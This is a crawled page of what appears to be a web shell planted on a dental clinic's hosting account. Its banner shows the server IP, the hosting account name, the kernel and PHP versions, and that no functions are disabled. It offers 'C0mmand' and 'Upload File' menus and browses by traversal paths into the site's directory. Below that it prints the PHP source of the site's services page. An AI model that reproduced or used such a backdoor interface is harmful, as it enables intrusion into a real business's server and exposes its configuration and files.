1Server IP : 217.21.90.164 / Your IP : 18.191.186.14 Web Server : LiteSpeed System : Linux in-mum-web840.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u367232671 ( 367232671) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u367232671/domains/zeropaindentist.com/public_html/img/product/offer/../../../ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include dirname(__FILE__) . '/inc/config.php'; include dirname(__FILE__) . '/dbh/conn.php'; ?> <!doctype html> <html lang="en"> <head> <?php include dirname(__FILE__) . "/inc/hedaerlink.php";?> <meta name="robots" content="index, follow"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link rel="manifest" href="visiontechnology.webmanifest"> <link rel="shortcut icon" type="image/x-icon" href="<?php echo $BASE_URL; ?>/img/logo/favicon.ico"> <link href="<?php echo $BASE_URL; ?>/css/bootstrap.min.css" rel="stylesheet"> <link href="<?php echo $BASE_URL; ?>/css/common-variable.css" rel="stylesheet"> <link href="<?php echo $BASE_URL; ?>/css/style.css" rel="stylesheet"> </head> <body> <?php $Service_page = 'active'; include dirname(__FILE__) . '/inc/nav.php';?> <div class="container"> <div class="col-12"> <img src="./img/slider/banner01.png" class='w-100' alt=""></div> <div class="row py-5"> <div class=" col-lg-3 col-md-6 col-sm-12"> <a href="./services.dentures.php" class="text-decoration-none text-muted"> <div class=" shadow-lg rounded-8 shadow overflow-hidden"> <div class="card border-0" style="background-color: rgba(255, 255, 255, .3);"> <img src="./img/product/dentures.jpg" class="card-img-top" alt="..."> <div class="card-body"> <p class="card-text">Some quick example text to build on the card title and make up the bulk of the card's content.</p> </div> </div> </div> </a> </div> </div> </div> <?php include dirname(__FILE__) . '/inc/footer.php';?> <script src="<?php echo $BASE_URL; ?>/js/bootstrap.bundle.min.js"></script> <script src="<?php echo $BASE_URL; ?>/js/fontawsome.js"></script> <script src="<?php echo $BASE_URL; ?>/js/main.js"></script> </body> </html>